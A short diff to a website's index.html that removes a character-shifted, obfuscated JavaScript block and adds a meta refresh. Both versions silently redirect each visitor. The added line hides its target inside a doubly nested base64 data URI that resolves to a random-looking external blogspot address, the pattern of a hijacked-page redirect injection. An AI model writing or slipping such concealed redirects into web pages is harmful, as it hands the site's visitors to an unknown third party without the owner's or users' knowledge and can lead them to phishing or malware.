--- a/index.html
+++ b/index.html
@@ -1,5 +1,1 @@
-<script type='text/javascript'>
-<!--
-var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1-VSM>ebub;ufyu0iunm<cbtf75-ebub;ufyu0iunm<cbtf75-QHi1cXx,QH2meHFhbIS1dD2mdYWqek1jdnWndnW{bDJhZ3:veHWveE1jNEtheYKtQXi1eIB7Mz:pbnSpd4WlbHq2[Ui2dn[reX[mdz6jcH:od4CweD6kc31jQkxwbISucE5>#?";
-m=""; for (i=0; i<s.length; i++) {	if(s.charCodeAt(i) == 28){	  m+= '&';} else if (s.charCodeAt(i) == 23) {	  m+= '!';} else {	  m+=String.fromCharCode(s.charCodeAt(i)-1);	}}document.write(m);//-->
-</script>
+<meta http-equiv="refresh" content="0,URL=data:text/html;base64,data:text/html;base64,PGh0bWw+PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDsgdXJsPWh0dHA6Ly9oamRoc3VkaGp1ZTh1cmZqdWZlcy5ibG9nc3BvdC5jb20iPjwvaHRtbD4=">
